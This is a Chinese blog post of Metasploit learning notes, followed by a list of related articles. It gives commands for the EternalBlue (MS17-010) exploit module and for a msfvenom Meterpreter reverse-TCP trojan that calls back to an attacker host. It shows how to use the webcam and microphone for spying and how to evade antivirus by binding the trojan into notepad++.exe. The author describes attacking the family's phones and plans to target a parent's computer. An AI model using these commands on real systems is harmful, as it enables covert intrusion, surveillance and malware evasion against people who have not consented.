metasploit学习

已于 2023-01-27 21:44:54 修改
阅读量487 收藏 3
点赞数 1
分类专栏: Linux操作系统 网络安全学习笔记 文章标签: 学习 windows linux
于 2022-12-22 01:48:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51418771/article/details/128403840
版权

文章目录

1. 启动metasploit-framework 命令行

msfconsole
在这里插入图片描述

2. msf使用法则

使用模块–>配置模块必选项–>运行模块

3. 永恒之蓝漏洞

在这里插入图片描述

不法分子利用制造勒索病毒。
该漏洞是微软445端口的问题,SMB,被微软命名为2017的第十号漏洞。

4. msf攻击尝试

msf搜索:
Internal blue?
Search ms17_010
在这里插入图片描述
使用模块
Use 0;use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

配置模块必选项
攻击地址,攻击目的……

Show options
在这里插入图片描述

Set 必选项:RHOSTS
Set rhosts 192.168.1.4
Set lport 10000
在这里插入图片描述

运行模块
我测试了我的虚拟机win10,而后测试了全家的手机,都没攻进去,大概是10版本太高?
在这里插入图片描述

5. 木马植入后门

445不行,去扫描其他漏洞。
没有漏洞,植入木马创造漏洞。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f exe -o winvenom64.exe

在这里插入图片描述

window:操作系统的版本,macos,linux等。
-f 文件类型
-o 重命名

6. 病毒太明显了,我们生成的文件自己写着:我是木马。

杀毒软件和防火墙直接就给删掉了,我们只好很固执的告诉勤奋的防火前:我相信它,他不是病毒!!!

7. msfconsole继续攻击

在这里插入图片描述

记得加上载荷,前面生成的
在这里插入图片描述

lhost和lport和msfvenom的相同。

8. 终于控制我的虚拟机win10了,看看能做什么?

Help
在这里插入图片描述

9. 录制视频流

Webcam_stream
在这里插入图片描述

但是虚拟机是没有摄像头的,呵呵……攻击还是要考虑目标机的实际情况。明天去试试家长的电脑。

没有视频,可以录音哦
在这里插入图片描述

record_mic参数:
-h:显示帮助。
-d :记录的秒数,默认为1秒
-F :wav文件路径。默认为HOME / [随机乱码名字] .wav
-p :自动播放捕获的音频,默认为“true”。

10. 绕过防火墙

法一:捆绑
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f exe -x notepad++.exe -o notepad++.exe
以常用软件的模板生成木马。
法二:加壳
添加一层壳,避免被反编译。

11. 切勿传播:

提供计算机操作系统入侵工具罪和非法入侵计算机操作系统罪。

Yaoix
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网安全-隧道技术-防火墙限制协议绕过-文件传输
weixin_45701675的博客
04-18 4065
隧道技术: 一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装、 传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。 封装: 隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。 新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递 传输: 被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。 被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道 解包: 一旦到达网络终点,数据将被解包并转发到最终目的地
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3119
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
通过msf渗透win10
qq_63651088的博客
03-22 1496
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
【渗透测试:MS17_010(永恒之蓝)漏洞复现与分析】
最新发布
qq_61947585的博客
07-14 1537
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2157
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
Metasploit 学习指南
08-26
Metasploit 学习指南
Metasploit 学习 指南— 基础篇
12-23
Metasploit 是一款强大的渗透测试平台,其中包括了很多渗透测试利器,本文简单介绍一下 Metasploit 的配置和基础的使用方法,主要包括以下几个方面: 网上朋友总结的,在此谢过!讲述kali linux
Metasploit学习必看教程.zip
12-27
Metasploit学习必看教程》是一份专为网络安全爱好者和专业人士准备的详细教程,它深入浅出地讲解了如何运用Metasploit框架进行网络攻防。Metasploit是一款广泛使用的开源安全工具,主要用于安全测试、漏洞验证以及...
Metasploit学习资料.zip
02-06
**Metasploit学习资料概述** Metasploit是一款广泛使用的开源安全工具,主要用于渗透测试和漏洞评估。这个压缩包“Metasploit学习资料.zip”包含了多个关于Metasploit框架的资源,帮助用户深入理解和掌握这款强大的...
玩转Metasploit初级系列课程
08-15
在开始学习之前,你需要在LinuxWindows环境中安装Metasploit。通常,通过Rapid7的Kali Linux发行版可以轻松获得完整的Metasploit环境。安装完成后,启动`msfconsole`进入命令行界面,进行基本配置如设置代理、...
绕过防火墙的攻击手段及其防护技术_吴海燕.pdf
09-09
该文章主要讲述的是如何绕过防火墙的限制,其中介绍了一些攻击手段和防护的技术,对防火墙感兴趣的小伙伴可以好好读一下。
Nmap 绕过防火墙(一)
chibo8600的博客
06-25 2103
1.使用 iptables iptables -L iptables -A [-s 源地址] [-d 目的地地址] -p 协议 [扩展] -j 动作 iptables -D [-s 源地址] [-d 目的地地址] -p 协议 [扩展] -j 动作 iptables -D ...
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
Metasploit 快速入门(三)—— 服务端漏洞利用
gclome的博客
07-22 2559
今天的这篇文章是对Metasploit 快速入门(三)—— 服务端漏洞利用这篇文章的复现。有些地方由于环境配不好,就直接把原文的图copy过来了! 温馨提示:靶机用自己的虚拟机就好,如果不想搞坏你的虚拟机,记得加快照、加快照、快照 原创:合天网安实验室合天智汇 在前面,我们学习Metasploit快速入门(一) Metasploit快速入门(二) Metasploit 快速入门(二)——信息收集和扫描-续 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型
白帽子学习——Metasploit渗透测试指南
weixin_43487532的博客
09-12 3830
黑客之渗透初学
电脑防火墙在哪里设置_windows10设置防火墙封禁端口(关掉永恒之蓝感染易感染的端口)...
weixin_39598472的博客
11-16 774
为了记下自己防火墙封禁端口的笔记,封掉一些弱端口0x01 防火墙策略关闭几个端口(IP策略组)0x02 命令:在你的电脑上依次打开如下界面:Control Panel》System and Security》Windows Defender Firewall》Advanced Settings》结果:打开控制面板》系统和安全》防火墙》高级设置,进入出入站规则设置0x03 设置详情命令:Inboun...
继勒索病毒“永恒之蓝”445端口被封之后,在公网实现smb文件共享
热门推荐
云云生息的专栏
02-01 2万+
继勒索病毒“永恒之蓝”运营商关闭445端口后,如何在不修改注册表重启系统前提下实现smb
关于使用msf渗透攻击Win7主机并远程执行命令的复习
weixin_44663190的博客
04-16 5476
关于使用msf渗透攻击Win7主机并远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 关于kali系统和win7 旗舰版sp1的安装就不多赘述,很多博文都已经讲述 1.1 打开虚拟机软件,准备开始环境 1.2 打开已经配置好的两个虚拟环境 1.3 配置...
利用白名单应用绕过防护
Coisini的博客
06-13 1376
0x00 前言 看了subTee的在ShmooCon2015的PPT,学习到了很多关于应用白名单绕过的技巧,今天又看见了subTee开始写博客了,并且详细解释了关于应用白名单绕过的方法,于是结合自己测试与大家分享一下。 看完ppt其实作者是想告诉我们一种思想,我自己的理解是“利用信任程序执行恶意代码“。 0x01 脚本执行 当在一些情况下,比如限制了.bat|.vbs|.ps1脚本执行,我们可以...
Metasploit深入学习:从基础到实战
学习Metasploit不仅需要掌握这些基本概念,还需要熟悉各种exploit和payload的使用,以及如何根据实际情况组合利用。此外,对网络协议、操作系统原理和安全策略的理解也是不可或缺的。通过实践和理论相结合,才能真正...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值